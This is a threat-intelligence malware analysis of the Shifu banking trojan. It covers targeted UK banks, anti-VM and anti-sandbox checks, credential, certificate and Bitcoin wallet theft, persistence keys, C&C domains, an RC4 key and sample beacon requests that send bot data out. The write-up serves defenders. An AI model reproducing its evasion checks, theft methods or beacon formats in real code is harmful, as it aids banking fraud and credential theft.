Shifu Malware Analyzed: Behavior, Capabilities and Communications



A Look at Shifu - Behavior, Capabilities and Communications...

As part of our normal course of operations as a cyber threat intelligence provider, we monitor the cyber crime underground and provide analysis to our clients on new and emerging threats. As you can imagine, we naturally run into large quantities of malware on a daily basis. From time to time, we release findings to the public in the interest of informing the community around new threats and providing actionable analysis to support the hunt and kill missions. Below is a write up on the Shifu trojan - we hope that you find this useful and that it helps you better protect your organization from this threat.

Should you have any questions about the details in this blog, please do not hesitate to drop us a line and we will work to get you the answers that you need.

Key Points:

  • Shifu is a novel malware family built using tactics, techniques and procedures (TTPs) from multiple malware families including Shiz, Zeus and possibly Dridex.
  • Noteworthy to Shifu is a custom application program interface (API) that is used to control the various aspects of the malware and to report the results of the API execution back to the attacker.
  • Httpd, an Apache HTTP server, is installed and used by Shifu to communicate with the attacker's command and control (C&C) server.

Known Targeted Entities...

At current, targeting seems to focus largely on the UK and Japan. However, this does not mean that other geographies are not at risk from Shifu and its controllers.

The following is a list of targeted UK entities (we are continuing our attempts to retrieve a list of targeted entities for Japan):

  • Adam & Company
  • Allied Irish Bank (IBusiness banking)
  • Bank of Scotland
  • Barclays
  • Clydesdale & Yorkshire Bank
  • Coutts & Co.
  • Danske Bank
  • Halifax
  • HSBC
  • Lloyds Bank
  • NatWest Online Banking
  • Royal Bank of Scotland Digital Banking
  • Santander
  • Triodos Bank
  • TSB Bank
  • Ulster Bank
  • Unity Trust Bank
  • Yorkshire Building Society

Analysis of Representative Malware Sample

iSIGHT Partners analyzed numerous samples of the Shifu malware. This malware recently donned the name Shifu, but earlier variants of the malware were referred to as "PowerAgent." The deviation in the name is due to the Windows Registry key that the malware creates, "IntelPowerAgent6."

The malware shares many similarities with other known banking Trojans such as Zeus, Dridex and Shiz. Like many malware families created after the emergence of Zeus, there is a blending of tactics, techniques and procedures (TTPs) for multiple malware families. Each of these similarities will be examined in detail.

The malware uses several methods to evade analysis and frustrate researchers. When first launched, the malware uses a loader to drop, install and patch the core payload prior to execution. If the payload is run as a standalone application, it will appear corrupted since the loader patches several payload parts during installation. It also has the capability to blacklist applications such as other bots, anti-virus (AV) applications and research tools. The malware uses cyclic redundancy check (CRC) hashes for any application that is blacklisted or whitelisted, as we will cover later.

In addition to the noted blacklist, the loader has a separate application blacklist check that will immediately end execution of the malware if a listed application is detected. Additionally, the loader will check a CRC hash of itself and, if found, will bypass any virtual machine (VM) detection routines. This check is possibly used for testing purposes, and the hash is based on the name of a development copy to prevent the malware from terminating as a result of running in a VM. The loader will also check to see if a SmartCard reader is attached to the infected machine and, if detected, will bypass any other VM detections routines. This is probably because the presence of a SmartCard reader signifies a physical machine rather than a VM.

Shifu also uses several more CRC hash lists to determine which branching function to use. The following are some of the lists or hashes the malware checks:

  • List of web browsers that will hook Winsock APIs if found to monitor network traffic
  • Specific domains and/or hashes that initiate C&C communications
  • Name/hash for httpd (standalone Apache HTTP server)
  • Point-of-sale (POS) process names and hashes for likely related applications
  • Bitcoin wallets

Although Shifu contains certain CRC hashes for identifying security products and analysis tools, it also contains a list of AV vendors to check. The malware will not terminate after identifying one of the following and will only check prior to posting any data to the attacker's command and control (C&C) server:

AVAST Avast Data Fellows - F-Secure Panda Software
Avg Doctor Web rising
Avira Eset - Nod Softed - ViGUARD
Bitdefender G Data Sophos
ComodoGroup KasperskyLab - protected Symantec
Coranti Microsoft Antimalware TrendMicro
VBA32 Network Associates- TVD Zone Labs - ZoneAlarm

Two components effectively make up the initial Shifu binary: a loader and a DLL (main payload). The loader is responsible for performing all of the anti-VM, anti-analysis and anti-sandbox checks. If all of the checks pass, the loader will decompress, patch and inject the core DLL into the shell process. Querying the following Windows registry key identifies the shell process:

  • HKLMSoftwareMicrosoftWindows NTCurrentVersionwinlogon"shell"

After querying the registry key, the loader attempts to inject the patched DLL in the shell process. Significantly, the DLL itself is in a corrupted state after decompression and requires the loader to patch it before injection into the shell process. The patching process is as follows:

  • Patch MZ, PE header
  • Patch entry point relative virtual address (RVA)
  • Patch import table RVA
  • Decode imports
  • Obfuscate all imported APIs

Static Analysis

Shifu is heavily obfuscated, and initial examination of the payload revealed little of interest aside from a possible custom packer used by the malware called "divederail" with a compile time of Aug. 6, 2015.



After successfully patching and examining the core DLL, the following project folder and debug string was revealed:

  • Z:codingprojectmainpayloadpayload.x86.pdb

During our analysis, we uncovered many different modules that the malware uses, including the following:

payload.cpp srcfuckup.cpp srcsystem.cpp
srcav.cpp srcipc.cpp srckillos.cpp
srcbot.cpp srckeylog.cpp srcseh.cpp
srccerts.cpp srcknock.cpp srcdebugmsg.cpp
srccmdinject.cpp srclogsend.cpp srcstr.cpp
srccmdload.cpp srcmitm.cpp srcfileio.cpp
srccmdmitm.cpp srcmsghook.cpp srcmemory.cpp
srccmdupdate.cpp srcproclist.cpp srchashes.cpp
srccommands.cpp srcrootkit.cpp srcjpeg.cpp
srcconfig.cpp srcsniffer.cpp srcinet.cpp
srcdga.cpp srcsystems.cpp srcdgalib.cpp
srcsysinfo.cpp srcvirtkeys.cpp srcosver.cpp
srcdllinject.cpp srcvnc.cpp  

The core payload has a plethora of capabilities and possible modules it can download for added functionality. The malware re-uses some functionality from Zeus, Dridex and Shiz. This data is highlighted below:

Zeus Functions:

  • tellerplus|bancline|fidelity|micrsolv|bankman|vanity|episys|jack henry|cruisenet|gplusmain|silverlake|v48d0250s1

(Same process checks seen from Zeus. If Shifu detects any of these strings, it will take a screenshot, post key log data and send system information to the attacker's C&C server.)

  • Additionally, some of the anti-analysis and anti-VM techniques are consistent with previous Zeus variants.

Shiz Functions:

  • Shifu uses a modified version of the Shiz DGA. The variables and methods used in the generation of the domains have changed.

Dridex Functions:

  • Although not an explicit function, Shifu uses an XML configuration file similar to that of the Dridex malware (aka Bugat).

Shifu is able to accept a range of commands, from updating the bot to destroying the operating system (OS). The following are the commands that Shifu supports:

inject active_bc deactive_sk
update deactive_bc docfind
load wipe_cookies block
kill_os active_sk mitm_mod
mitm_script    

In addition to being able to use the above commands, Shifu uses a custom API for controlling the bot and reporting results of the API execution back to the C&C server. The following is a table containing these API functions:

Avlnit FileSaveTo PayloadRoutine
AvProcessResult FileToBase64 PrintScreenJpeg
BotEnableAutorunAndProtect FileWrite ProcessCommand
BotFixAutorunPolicy FuckupJP ProcListInjectAll
BotIsResident GetLastErrorWinInet ReportOKCmd
BotNameInitialize HashHash RkSetHidden
BotProtectFile HashToStr RootkitInit
CertgrabProccessSystemStores HttpSendRequestExtended SehInitialize
CertHandlerContinue IeFixCDX SendAccount
CertsFixValidateCA InetDownloadFile SnifferInit
CertsSetHooks InetHostCheckConnection StartHttpd
CheckFileMD5 InetIsHostOnline StartKnockRoutine
CheckProcessesFromZeusGOV InetSendRequestPOST StrGetTextBetween
CheckResidentStateThread IpcInitServerThread StrUnicodeToAscii
CommandDoInject IpcListen SysCloseHandle
CommandDoLoad IpcProcessPipeStr SysEnableExeAutoRun
CommandDoMitmMod IpcProcessSendWEbLog SysExecuteFile
CommandDoMitmScript IpcProcessSetSocksPort SysGetModuleHandlePin
CommandDoUpdate IpcProcessSetVncPort SysGetNiceCompName
ConfigCheckPlugins IpcSendSystem SysGetNiceUserName
ConfigForceRead IpcSendWebSniffLog SysGetProcessIntegrityLevel
ConfigInit KeyLogAddToLog SysGetUserProfileDir
ConfigLoad KeyLogGetLastCaption SysInfoNetstat
ConfigProcessPacked KeyLogInit SysInfoNetUser
ConfigSave KnockDoKnock sysInfoTaskMgr
ConfigWatch KnockRoutine SystInitializeLowSecAttrs
ConnectToNewClient LogSendData SysInjectDllToProcessById32
DomainCheckSign LogSendSystemLogEx SysIsCompInDomain
DomainCheckThread LogSendWebLog SysIsKernelLoaded
DomainDownloadKey MemAlloc SysIsProcessActiveByCRC32
DomainValidateKeyStr MemProtect SysIsTerminalSessionProcess
EntryPoint MemRealloc SysIsWow64
ExportCertificates MitmInit SysKillOs
FileCryptDecryptRC4 MitmWriteConfigPhp SysLoadLibraryAndCallOrdinal32
FileDelete MitmWriteListenAddrs SysStartThread
FileDeleteDir MsghookInit SystemsCheckCryptoWallets
FileDeleteSubDir MyPFXImportCertStore SystemCheckDirs
FileGetSize OsGetVersion SysTerminateProcessByPid
FileGetTemp PatchChromeCertCheck TopLevelIExceptionHandler
FileLoadFrom Patchcrptui VkIsGoodWindow
FileMakeDir Patcrsaenhnew VkMageMicroScrshot
FileRead PayloadResidentRoutine VNCIsVNC

Anti-Analysis, Anti-VM & Anti-Sandbox

Many different types of malware are designed to detect the presence of a VM, sandbox or if the malware is being analyzed or debugged. Shifu takes this detection to an extreme level by including dozens of checks with branching functionality, from terminating itself to reporting back to its C&C server. The following sections list the various checks that Shifu performs, including the CRC32 hashes the malware will check against running processes. Due to the possibility of collisions, we are unable to perform reverse CRC32 hash lookups in an attempt to find the name of the processes targeted:

Terminate Immediately
SANDBOX 278CDF58 6E9AD238 33495995
FORTINET 99DD4432 E90ACC42 68684B33
sbiedll.dll 1F413C1F 4231F0AD B4364A7A
dbghelp.dll 6D3323D9 D20981E0 9305F80D
api_log.dll 3BFFF885 CCEA165E C4AAED42
dir_watch.dll 64340DCE FCA978AC 14078D5B
pstorec.dll 63C54474 46FA37FB 7EDF4F6
c:analysissandboxstarter.exe 2B05B17D EEBF618A D3B48D5B
c:analysis F725433E 6AAAE60 332FD095
c:insidetm 77AE10F7 5BA9B1FE 2D6A6921
c:windowsystem32driversvmmouse.sys CE7D304E 3CE2BEF3 2AAA273B
c:windowsystem32driversvmhgfs.sys AF2015F2 A945E459 777BE06C
c:windowssystem32driversvmboxmouse.sys 31FD677C 877A154B E84126B8
system32rstrui.exe 8662660 5676DCEA 6C6E6A74
0A84E285 1BF6717E 11520499 6A9F12C2
3C164BED 9DA652F5 52832504 E5700683
C19DADCE 818B9822 7FF8A7C4 124F656
552D4ED4 48A752AD 75159163 AAE6CF31
Additional checks the malware makes to determine branching functionality are summarized in the following table:
Skip VM Check SmartCard reader found 5217027 CRC of malicious payload
If running on 64-bit system
Hook Winsock API (Traffic Monitor) 84E35F10 | firefox.exe
C3DDC6D5 | iexplore.exe
9C1D0D0E | chrome.exe
Restart Internal Apache HTTP Server 82D037E3h
Connect to C&C (if connection is made to the listed domains, malware will connect to C&C)  
Branching Functionality to Take Screenshot, Grab System Information and Capture Key Log Data to Send to C&C Server
OmikronMCSign MCSIGN ELBALOCAL HBPDatahbp.profile HBP ELBA5ELBA_data
tellplus bancline fidelity micrsolv bankman vanity
episys jack henry cruisenet gplusmain silverlake v48d0250s1
pos.exe D5AFE347 1520C6FC 8D73940 6164D621 7F006276
bank.exe 3CD2F52B EB3E9524 7EA56DD4 9E514577 1112E894
POS D0393D82 16B88982 D697181B 48D0E729 8A431577
F33B69C9 900F48CB 432A30F6 40C1472D 6A367AC C7F12F81
600FE875 2FE5DDDB FEC95559 EBBA8818 9330B1BC 482DD2A1
C0507C47 7F383A3D CA8F2447 1A8549EE D4D1DABB 1F8A1A34
C25C84B6 DB4FF76A 4399C284 ASE4363A EB821910 D1C1A6F1
CE5D9477 1008DDC9 920F9997 52DDCFE9 530DFC96 61774F83
F10C467C 9B282310 7C934BFA EAE4D38E 9C5305AC B6A73D4C
EDB8ED84 147A1679 7314615B 9CEC32CD B0BEBB22 637690A0
B7F66707 72C1148A 1EC38064 9B0FF98 2DE62E2CC 630380BD
D9CFAAFC 811FE2F6 E1D08BD3 DAA840B0 7D292DSC 34A3856D
F4DD7D00 B35A1FBF CED3FE41 2E76EDDA D81477DF D9C7E1E
6B4737017 5465EE3B 57FF7496 EE3F8F14 FB98997A 61B3C004
C3C39C30 78D00514 FE5AD73D CAD75136 61B3C004 B4B3079
9CD1C89B 89FEE818 38AF4595 6166CBFE 4D50DB3A 28F258E8
7D0208BC 22BCF394 C5955648 21E4F6E1 9F44E2AD D00D57A1
AE21F4BD A5EF5232 DC940E90 254BF12 1F8F32DD 8AA8ADD1
373DD31D 28E223B0 28EFE770 45B5186D CC52CBB0 D35B8E8B
B19BE433 A649FA98 SFD4AF15 B49A7001 6194AEDD DB5B130C
C2803376 3DCF12DB 6F39D5E5 E58E420F A1B089CF ADE4FF12
542A88E0 C8D635E6 851F2672 B48B2BE6 CF3FE156 87D7BE37
8ECCE46 21E0C754 AEA032F4 8B34C6B4 6863CBC4 AF407D3F
1557F882 E8A0F232 226A31 54E18969 208AG703 9EAA7E6D
CD7007CE DBF32FA8 3F8C2811 CF18FB77 2A819D48 9427565
AD1A170A BC90AA40 6DCA34D9 3EDDD0CC 6AA08F8 A301D995
B035BEAD 7E682F49 DD63FE4B F761556A 4FDDDDBA D5202EDF
71DEA7D8 83ED7E1E CBCA91DA C2666E5E E9D4AA1C 35121417
EEDAEB84 EC18D835 1FF114CE 20F676DD FA429238 7250472
68B0A2D2 E7868E6A 831BB9C2 1E6CC84E 23E559EE 46729516
16B3C140 A053B931 EBFB0CC8 FEA3B580 5C5424CD 7439D83C
SFD22F11 2A77EE37 7C0A2C03 89961D2B 72F9117D 9A0ABBDD
117C8602 BEC4AE1B B317125A 6D38C83E 4941148D C47610CC
B8132034 7C0A2C03 SACE07E5 161C6399 2CC8BE52 1177CB80
CD47F86A 56A6914D F17E2S3B 5BA8998F E05FC686 368506FF
C04B8655          

In addition to these searching and branching functions, Shifu will also search the infected machine for Bitcoin-related items in an attempt to steal the data and upload the C&C server. Shifu attempts to find the following files:

  • bitcoinwallet.dat
  • litecoinwallet.dat

If the Bitcoin files are found, the data is saved in a new file prior to uploading to the attacker's C&C. The following file names will be used for the captured data:

  • btc_wallet.dat
  • ltc_wallet.dat

Shifu also contains a list of processes to monitor on the infected machine. The goal of the monitoring is to blacklist and corrupt downloaded binary files from running on the infected system. The malware hooks the URLDownloadToFile API in the urlmon.dll library to facilitate this capability. The following snippet illustrates the file rename to "infected.exx," processes to monitor and API function to hook:

 


During installation, the loader for Shifu will query a number of settings to include the computer name, user name, install date and system drive volume serial number. The malware will then create a string with the compiled data. If the "string" of data contains any sub-strings defined by the malware, it will set a control flag, which will likely trigger an event from the C&C server. The following is a list of the "sub-strings" hardcoded into the binary (Note: several of the sub-strings appear to be Russian words or parts of words):

TRADE  
BOSS 6occRussian and similar in pronunciation
CAPO May refer to head of a branch for an organized crime syndicate. However, the translation is slightly off as the "c" would be a hard "k"sound in Russian
ROSPIL RosPil is a non-profit community project dedicated to combating abuse and is associated with the political activist Alexey Navainy. "ROS" may refer to "Rossia" or "Russia"
FINOTDEL Russian word meaning "Financial Department"
OPER Likely abbreviation for "operation"
MANAGE  
MONEY  
FINAN Likely abbreviation for derivatives of "finance"
DIREK Possible abbreviation for the Russian word meaning "Director" in English
KASS "Cashbox" or "Cash Desk"
CASH  
ACCOUNT  
BANK  
BUH Possibly the first syllable in the Russian word for "accounting"

Shifu is also designed to search for authentication information (AUTHINFO) on the infected machine. Specifically, it searches for the following:

  • USER
  • PASS
  • ACCT
  • AUTHINFO USER
  • AUTHINFO PASS

In order to capture this information, the malware will hook the following API functions:

  • send
  • WSASend
  • CryptEncrypt
  • SSL_Write

If ports 110 or 31595 are open, the captured credentials will be saved as e-mail credentials. If the ports are not open, the credentials will be saved as FTP credentials.

In addition to grabbing the AUTHINFO data, the malware will capture any SSL certificates on the machine. If the cert is captured, the malware will rename it as _info.pfx (i.e. 1_info.pfx) and then sequentially increase the number. The following strings show the hard-coded format to save the file and the API function used to capture the data:

  • %s%s%u_cert.pfx
  • %s%s%u_info.txt
  • CertEnumSystemStore

Behavior on Infected System (Dynamic Analysis)

Upon initial execution, Shifu behaves similar to many malware families by generating a randomized name for a local copy of itself in the user's %ProgramData% folder. It will then execute a loader in a separate process that patches the main payload DLL and handles the injection into the shell process, explorer.exe.

In parallel to the launch, the malware will create a BAT file with deletion commands for the original binary. This has become the standard for much of the recent e-crime malware. Shifu also creates two different registry keys used for persistence and to survive a reboot. One of the registry entries is a RUN key to startup on reboot of the infected system.

The malware will also initiate a keylogger and begin beaconing out to an attacker's C&C domain. The initial domain is hardcoded into the malware, but if connection repeatedly fails, Shifu will fall back to its DGA, which is a modified adaption of the Shiz DGA. Several other files are created on disk as well. The following list shows the various artifacts created after launching the malware:

  • C:%ProgramData% d04dj0886b.exe
    (Copy of the original binary)
  • C:%AppData%Locallld7D53.tmp.bat
    (Deletion script)
  • C:%AppData%LocalTemp2d17e659d34601689591
    (Text file with location of copied binary)
  • C:%AppData%a8ee54f4sysinfo.txt
    (Collected information on running process on the infected machine)
  • C:%AppData%a8ee54f4
    (Key log data)

Registry Modifications & Persistence Method

  • Key: HKCUSoftwareMicrosoftWindows2d17e6

  • Key: HKCUSoftwareMicrosoftWindowsCurrentVersionRunIntelPowerAgent6
    • We have also observed different IntelPowerAgent numbers such as two, three, four or five.


Command and Control

Shifu contains a hard-coded URL for the first initial contact but also has a DGA that it will fall back on if the main C&C is offline. This DGA is modeled after Shiz but uses slightly different parameters for generating the domains. All of the communications that follow a successful connection use Secure Socket Layer (SSL). See the following for one of the more recent SSL certificates which has already been blacklisted:



The bot will report key information back to the C&C, including the result of the various custom API executions. The first communications include any hard-coded C&C followed by the DGA. Shifu uses RC4 encryption in the network communications. Notably, the key for the samples analyzed by iSIGHT Partners is actually the default RC4 key included with the Crypto library, further suggesting this malware is under development. The following is the key observed:

  • a7zoSTHljZylEx4o3mJ2eqIdsEguKC15KnyQdfx4RTc5sjH
    The following are some of the observed hard-coded domains and DGA domains:
  • noyokoya-info.chu.jp
  • eboduftazce-ru.com
  • adtejoyo1377.tk
  • fat.uk-fags.top
  • urkaelt.info (DGA)
  • nqqxqdg.info (DGA)
  • fvffynt.info (DGA)
  • njkyhle.info (DGA)
  • oaoyorw.info (DGA)
  • raemscf.info (DGA)
  • pbchjln.info (DGA)
  • bgnqado.info (DGA)
The following is an example POST made by the malware if it is successful in achieving a connection with the C&C:

POST https://eboduftazce-ru.com/news/userlogin.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://www1.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: eboduftazce-ru.com
Content-Length: 92
Cache-Control: no-cache

After the initial POST, the malware will perform a check-in with the following GET request:

GET /logs/dbg.php?msg=W3NyY1xib3QuY3BwOkJvdElzUmVzaWRlbnQ6MTcxXVsweGViMDsweDdjY10gQm90SXNSZXNpZGVudCByZXR1cm5lZCBGQUxTRQo= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: noyokoya-info.chu.jp
Connection: Keep-Alive

Decrypted "msg" Data: [srcbot.cpp:BotIsResident:171][0xeb0;0x7cc] BotIsResident returned FALSE

Shifu sends many different check-ins back to the C&C server. These check-ins are based on the execution of the custom API functions. After the bot uses a function, the execution result is sent back to the C&C. The following is a list for many of the "msg" check-ins:

  • [:BotIsResident:153][0xef8;0xbe0] MutexName = 2d17e659d346, hMutex = 0x000000ec, GetLastError() = 0x000000b7
  • [:BotNameInitialize:388][0x6e4;0x960] BotName: ADMINISTRATOR!MIR!FB950325
  • [:KnockDoKnock:108][0x6e4;0x960] KnockBuffer: botid=ADMINISTRATOR!MIR!FB950325&ver=1.537&up=347&os=2300<ime=%2b5&token=0&cn=a3&av=&dmn=
  • [:HttpSendRequestExtended:116][0x6e4;0x960] break; GetLastErrorWinInet: ERROR_INTERNET_CANNOT_CONNECT
  • [:GetLastErrorWinInet:127][0x6e4;0x960] break; 00000000
  • [:InetSendRequestPOST:249][0x6e4;0x960] break; GetLastErrorWinInet: (null)
  • [:KnockDoKnock:175][0x6e4;0x960] KnockDoKnock <=
  • [:ProcListInjectAll:325][0x6e4;0x968] First time inject in: HEdit.exe [0x00000b04]
  • [:BotIsResident:153][0xb04;0x9b0] MutexName = 2d17e659d346, hMutex = 0x000000d4, GetLastError() = 0x000000b7
  • [:ProcListInjectAll:325][0x6e4;0x968] First time inject in: notepad++.exe [0x0000089c]

The Shifu Trojan has targeted entities in the UK and Japan. As noted previously, the malware runs a local Apache httpd server. This server is used to handle C&C communications, retrieve configuration data and store the web injects. The configuration data is stored in a "data" folder within the Apache install folder. The web injects are stored in a file titled "config.xml." Notably, upon initial installation the files in the "data" folder are encrypted. After successful connection to the C&C server, the files are populated with the download configuration and web injects data from the C&C server and stored unencrypted. The following is a snippet taken from one of the configuration files targeting the UK:



The following is a list of the targeted UK entities (we are continuing our attempts to retrieve a list of targeted entities for Japan):
  • Adam & Company
  • Allied Irish Bank (IBusiness banking)
  • Bank of Scotland
  • Barclays
  • Clydesdale & Yorkshire Bank
  • Coutts & Co.
  • Danske Bank
  • Halifax
  • HSBC
  • Lloyds Bank
  • NatWest Online Banking
  • Royal Bank of Scotland Digital Banking
  • Santander
  • Triodos Bank
  • TSB Bank
  • Ulster Bank
  • Unity Trust Bank
  • Yorkshire Building Society

Also contained in the "data" folder is a config.php file. Based on publicly reported information, this file defines the following:



The final file within the "data" folder is the "index.php" file. This file is a set of instructions for the bot used to communicate with the C&C server. It also includes instructions on how to process the web injects. This file is populated upon installation of the httpd server but is encrypted until a valid C&C connection is established. After the C&C connection is successful, this data will be decrypted and stored along with the config and web injects files. The following are some of the functions found in this file:



Let Us Know if We Can Help...

We hope that you find the information above useful in your efforts to better secure your organization. If there are lingering questions, please do not hesitate to drop us a line and we will work to answer them for you. If you'd like to learn more about what we do in monitoring the cyber crime underground, download our on-demand webinar. If you would like to get a deeper look at our intelligence around cyber crime, feel free to request a free trial.

Keep fighting the good fight - we're with you in the trenches - we're up 24/7/365 all over the world...because someone should do something!